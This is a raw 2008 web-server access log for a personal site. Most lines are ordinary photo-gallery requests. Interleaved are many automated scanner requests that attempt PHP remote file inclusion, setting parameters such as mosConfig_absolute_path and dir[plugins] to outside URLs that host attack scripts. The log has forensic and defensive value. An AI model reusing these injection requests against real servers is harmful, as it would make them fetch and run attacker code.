72.199.235.196 - - [20/Sep/2008:09:35:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013_3.jpg HTTP/1.1" 200 434812 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0075.jpg HTTP/1.1" 200 372101 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0153.jpg HTTP/1.1" 200 343210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-155_1.jpg HTTP/1.1" 200 409403 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-148_0.jpg HTTP/1.1" 200 274811 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0062.jpg HTTP/1.1" 200 470360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:43 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0137_0.jpg HTTP/1.1" 200 385301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-135.jpg HTTP/1.1" 200 453569 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0067.jpg HTTP/1.1" 200 301438 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0169.jpg HTTP/1.1" 200 387384 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-053_0.jpg HTTP/1.1" 200 433947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:58 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-244.jpg HTTP/1.1" 200 244888 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:35:59 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:35:59 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:35:59 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:00 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92301 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:00 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92269 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:00 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:01 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92285 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:01 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:01 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:04 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:05 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92301 "-" "libwww-perl/5.803" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:05 -0700] "GET /logs/access_080811.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:05 -0700] "GET /logs/access_080621.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:05 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:06 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0018.jpg HTTP/1.1" 200 320247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.11.160.111 - - [20/Sep/2008:09:36:08 -0700] "GET /logs/access_080412.log/?sourcedir=http://ocean.web-wel.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-254.jpg HTTP/1.1" 200 298755 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:09 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 200 92931 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:09:36:10 -0700] "GET /logs/access_080621.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.11.160.111 - - [20/Sep/2008:09:36:10 -0700] "GET /?sourcedir=http://ocean.web-wel.com/id.txt?? HTTP/1.1" 200 92180 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:09:36:10 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:09:36:10 -0700] "GET /logs/access_080811.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:10 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 200 92931 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:09:36:11 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 200 92931 "-" "libwww-perl/5.800" "www.dmulk.com"
87.11.160.111 - - [20/Sep/2008:09:36:11 -0700] "GET /logs/?sourcedir=http://ocean.web-wel.com/id.txt?? HTTP/1.1" 200 65877 "-" "libwww-perl/5.805" "www.dmulk.com"
87.11.160.111 - - [20/Sep/2008:09:36:13 -0700] "GET /logs/access_080313.log/?sourcedir=http://ocean.web-wel.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [20/Sep/2008:09:36:13 -0700] "GET /logs/access_080816.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:13 -0700] "GET /logs/access_080621.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:13 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:09:36:13 -0700] "GET /logs/access_080811.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [20/Sep/2008:09:36:13 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [20/Sep/2008:09:36:14 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:17 -0700] "GET /logs/access_080228.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:17 -0700] "GET /logs/access_080228.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:17 -0700] "GET /logs/access_080228.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:36:18 -0700] "GET //common/db.php?commonpath=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:18 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0036.jpg HTTP/1.1" 200 378857 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:36:20 -0700] "GET /logs/access_080228.log/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003_0.jpg HTTP/1.1" 200 362527 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0122.jpg HTTP/1.1" 200 508109 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:31 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0092.jpg HTTP/1.1" 200 538619 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-111_0.jpg HTTP/1.1" 200 455376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:43 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.1" 200 332772 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:44 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0121.jpg HTTP/1.1" 200 373247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-130_1.jpg HTTP/1.1" 200 382763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-157_0.jpg HTTP/1.1" 200 184299 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:55 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1015.jpg HTTP/1.1" 200 280431 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0010.jpg HTTP/1.1" 200 343766 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-094_0.jpg HTTP/1.1" 200 283329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-035.jpg HTTP/1.1" 200 544194 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:37:08 -0700] "GET /logs/access_080623.log/inc/function.php?env[include_prefix]=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:09 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0109.jpg HTTP/1.1" 200 364454 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-020_1.jpg HTTP/1.1" 200 375280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-173.jpg HTTP/1.1" 200 357615 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:19 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1026.jpg HTTP/1.1" 200 345929 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:20 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:20 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:22 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0021.jpg HTTP/1.1" 200 360229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:23 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-043_0.jpg HTTP/1.1" 200 335634 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002_3.jpg HTTP/1.1" 200 456103 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0159.jpg HTTP/1.1" 200 381231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:31 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:32 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:32 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92285 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:32 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92285 "-" "libwww-perl/5.803" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:33 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:33 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:34 -0700] "GET /logs/index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:34 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92285 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0027.jpg HTTP/1.1" 200 494363 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.251.144.78 - - [20/Sep/2008:09:37:35 -0700] "GET /index.php?redir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 92285 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-248.jpg HTTP/1.1" 200 391734 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:37:37 -0700] "GET /logs/access_080527.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:39 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:39 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-168.jpg HTTP/1.1" 200 421778 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:39 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:39 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:40 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:42 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0141.jpg HTTP/1.1" 200 378474 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:43 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1017.jpg HTTP/1.1" 200 322953 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:47 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0019.jpg HTTP/1.1" 200 359204 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-287.jpg HTTP/1.1" 200 297926 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017_0.jpg HTTP/1.1" 200 320520 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:52 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:52 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:37:52 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:55 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1016.jpg HTTP/1.1" 200 304849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:37:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0022.jpg HTTP/1.1" 200 477179 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-161.jpg HTTP/1.1" 200 609582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-023_1.jpg HTTP/1.1" 200 250157 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:05 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:38:10 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:38:10 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:38:10 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
